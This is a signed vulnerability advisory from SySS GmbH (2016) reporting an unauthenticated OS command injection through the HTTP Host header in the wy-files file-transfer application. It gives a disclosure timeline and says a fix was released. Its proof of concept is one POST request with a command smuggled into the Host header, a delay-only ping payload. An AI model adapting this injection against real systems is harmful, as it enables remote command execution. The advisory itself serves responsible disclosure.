-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2016-040 Product: wy-files Manufacturer: wycomco GmbH Affected Version(s): Unspecified Tested Version(s): Unspecified Vulnerability Type: OS Command Injection (CWE-78) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2016-05-09 Solution Date: 2016-06-16 Public Disclosure: 2016-07-18 CVE Reference: Not yet assigned Author of Advisory: Sascha Muenzberg, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: wy-files is a web based file transfer application provided by the wycomco GmbH. Due to improper input validation, the web application is vulnerable to OS Command Injection attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: SySS GmbH found out that the web application uses the HTTP Host header from at least one POST request without further input validation inside an OS command. This vulnerability allows an unauthenticated attacker to inject and execute arbitrary os commands. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTTP request using the attack vector '|ping -c 21 127.0.0.1 # can be used to show that the ping command is executed and causes a delay of the response. POST /fst/Login/login.html HTTP/1.1 Host: example.com'|ping -c 21 127.0.0.1 # Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 mail=syss&password=syss&hash=test ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to information by the wycomco GmbH, the reported security vulnerability has been fixed in a new software release. Please contact the manufacturer for further information or support. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-05-03: Vulnerability discovered 2016-05-09: Vulnerability reported to manufacturer 2016-06-16: Vulnerability fixed by manufacturer 2016-07-18: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] SySS GmbH, SYSS-2016-040 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-040.txt [2] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: Security vulnerability found by Sascha Muenzberg of the SySS GmbH. E-Mail: sascha.muenzberg@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Muenzberg.asc Key ID: 0x73033C4F Key Fingerprint: 63FF 27B8 3E36 5475 1C0E CB5D 27C6 0C38 7303 3C4F ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJXjMBjAAoJECfGDDhzAzxPa3kQAMfLV7itcSY7W9lAU55B3HHL xqtD4kud0P1JLcUYJMVI2iybfxwee/SMtZlG6ZYXZgeQd7lt/lxE/MkmTnw8oyh5 eD50J6UtKQLf15463boa7CFZD0esd+EaTg6hSD+pY/PjeK2M8S5WpRfwNrNNrq9b /D2OHKWbbWkNeOqw+NFB0x2SMQC1uFA0NaXtiW20TE9m0Z42BB228VH5CXoQrcbK eTWFr0HA73rY6ONCJGy6My6NP/W6CC6jrruH/TnAXetbMUqNgmQPQLYFNW2TLV1Y dA0mzTPKE1nyQsBPi24gPZG3iJodjdaYLvwSzP8/jfeVQSpiu4A6yYOGxyW5maXc EYClK7LEOmnGiUbK5aLEqKmpDuUxzp0O4taq033nSP4Ya0xyEkEwXZe74Hesao4V ITJoVenKWXqYm9ErNKlLal9dAA7a0wiZDCfZce+4zzD7GCb0djlIsFJnwLTvZR+r EETqDrvoBP/MdkrTNtt4EmpdvkYUfDepGhpPMe8VeufQRhVW0Yh5ekF91uu65Dye 97LYy+5sdDpyJkjgDM/USXJsFAopLZ2FTg1ZxuVlpFUSzIaM3dw+hm8FpAP3XMmr 6CYB8TkopZkOU/GYNZ9bX7L+2uojh1pdfxi7yixM0NdltKEBm1/7JafRsEhML1zb CUY6q/Zn/XLVlBup1NDk =NfKP -----END PGP SIGNATURE-----